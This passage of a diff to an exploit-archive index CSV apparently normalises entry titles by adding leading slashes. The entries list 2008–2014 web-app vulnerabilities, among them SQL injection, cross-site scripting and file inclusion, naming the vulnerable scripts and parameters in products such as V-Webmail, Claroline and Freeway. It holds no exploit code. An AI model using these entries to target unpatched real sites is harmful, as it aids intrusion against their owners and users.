Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - '/admin/login.php Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - 'last_records.php?annuaire' Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - 'annuaire.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-11,"Sylvain THUAL",php,webapps,0 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 @@ -32849,7 +32850,7 @@ id,file,description,date,author,platform,type,port 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php?id' SQL Injection",2014-02-28,HauntIT,php,webapps,80 @@ -32880,24 +32881,24 @@ id,file,description,date,author,platform,type,port 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 -32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - admincp/faq.php Injection adminlog.php Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 +32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - 'admincp/faq.php Injection adminlog.php' Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 -32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - 'index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 +32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - '/index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 -32024,platforms/php/webapps/32024.txt,"V-Webmail 1.6.4 - 'includes/pear/Mail/RFC822.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32025,platforms/php/webapps/32025.txt,"V-Webmail 1.6.4 - 'includes/pear/Net/Socket.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32026,platforms/php/webapps/32026.txt,"V-Webmail 1.6.4 - 'includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32027,platforms/php/webapps/32027.txt,"V-Webmail 1.6.4 - 'includes/pear/XML/Tree.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32028,platforms/php/webapps/32028.txt,"V-Webmail 1.6.4 - 'includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32029,platforms/php/webapps/32029.txt,"V-Webmail 1.6.4 - 'includes/pear/Console/Getopt.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32030,platforms/php/webapps/32030.txt,"V-Webmail 1.6.4 - 'includes/pear/System.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32031,platforms/php/webapps/32031.txt,"V-Webmail 1.6.4 - 'includes/pear/Log.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32032,platforms/php/webapps/32032.txt,"V-Webmail 1.6.4 - 'includes/pear/File.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32033,platforms/php/webapps/32033.txt,"V-Webmail 1.6.4 - 'includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - 'includes/cachedConfig.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - 'includes/prepend.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - 'includes/email.list.search.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32024,platforms/php/webapps/32024.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32025,platforms/php/webapps/32025.txt,"V-Webmail 1.6.4 - '/includes/pear/Net/Socket.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32026,platforms/php/webapps/32026.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32027,platforms/php/webapps/32027.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/Tree.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32028,platforms/php/webapps/32028.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32029,platforms/php/webapps/32029.txt,"V-Webmail 1.6.4 - '/includes/pear/Console/Getopt.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32030,platforms/php/webapps/32030.txt,"V-Webmail 1.6.4 - '/includes/pear/System.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32031,platforms/php/webapps/32031.txt,"V-Webmail 1.6.4 - '/includes/pear/Log.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32032,platforms/php/webapps/32032.txt,"V-Webmail 1.6.4 - '/includes/pear/File.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32033,platforms/php/webapps/32033.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - '/includes/cachedConfig.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 +32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - '/includes/email.list.search.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 @@ -32915,18 +32916,18 @@ id,file,description,date,author,platform,type,port 32063,platforms/php/webapps/32063.txt,"Claroline 1.8.9 - document/document.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32064,platforms/php/webapps/32064.txt,"Claroline 1.8.9 - exercise/exercise.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32065,platforms/php/webapps/32065.txt,"Claroline 1.8.9 - group/group_space.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32066,platforms/php/webapps/32066.txt,"Claroline 1.8.9 - 'phpBB/newtopic.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32066,platforms/php/webapps/32066.txt,"Claroline 1.8.9 - '/phpBB/newtopic.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32067,platforms/php/webapps/32067.txt,"Claroline 1.8.9 - phpBB/reply.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - '/claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'Username' Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 32078,platforms/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,php,webapps,0 -32079,platforms/php/webapps/32079.txt,"CreaCMS - 'edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 -32080,platforms/php/webapps/32080.txt,"CreaCMS - 'fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32079,platforms/php/webapps/32079.txt,"CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 +32080,platforms/php/webapps/32080.txt,"CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 - 'comaddok.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 - 'comlook.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 @@ -32939,16 +32940,16 @@ id,file,description,date,author,platform,type,port 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 -32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php?fct' Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 -32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - 'modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 +32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 -32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - 'tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 -32109,platforms/php/webapps/32109.txt,"Claroline 1.8 - 'tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32109,platforms/php/webapps/32109.txt,"Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 @@ -33018,9 +33019,9 @@ id,file,description,date,author,platform,type,port 32213,platforms/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 -32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - 'visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 +32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php' filter Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 -32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - 'staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 +32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 32230,platforms/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps,0 @@ -33036,23 +33037,23 @@ id,file,description,date,author,platform,type,port 32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 -32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - 'administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 -32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - '/administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - '/mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 -32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - 'english/account.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 -32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - 'french/account_newsletters.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - 'includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - 'includes/modules/newsdesk/newsdesk_article_require.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 - 'templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - '/french/account_newsletters.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 - Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps,0 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",php,webapps,0 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 @@ -33134,7 +33135,7 @@ id,file,description,date,author,platform,type,port 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated Remote Code Execution",2014-03-22,"Brandon Perry",php,webapps,0 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 -32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 +32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 32448,platforms/java/webapps/32448.txt,"Celoxis - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 @@ -33155,13 +33156,13 @@ id,file,description,date,author,platform,type,port 32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 -32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - 'modules/mod_language.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-14,faithlove,php,webapps,0 +32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 - '/modules/mod_language.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-14,faithlove,php,webapps,0 32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,php,webapps,0 32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Cross-Site Scripting",2008-10-16,faithlove,php,webapps,0 32494,platforms/php/webapps/32494.txt,"FlashChat - 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,php,webapps,0 -32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 - 'admin/cms/images.php?orderby' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 -32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 - 'admin/cms/nav.php?nav_id' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 - '/admin/cms/images.php?orderby' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 - '/admin/cms/nav.php?nav_id' SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' SQL Injection",2008-10-20,r45c4l,php,webapps,0 32498,platforms/asp/webapps/32498.txt,"Dizi Portali - 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"PHPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps,0 @@ -33242,11 +33243,11 @@ id,file,description,date,author,platform,type,port 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script - 'advertisers/signinform.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script - '/advertisers/signinform.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script - 'gallery.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script - 'lostpassword.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - 'admin/adminhome.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 -32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - 'admin/index.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - '/admin/adminhome.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - '/admin/index.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn 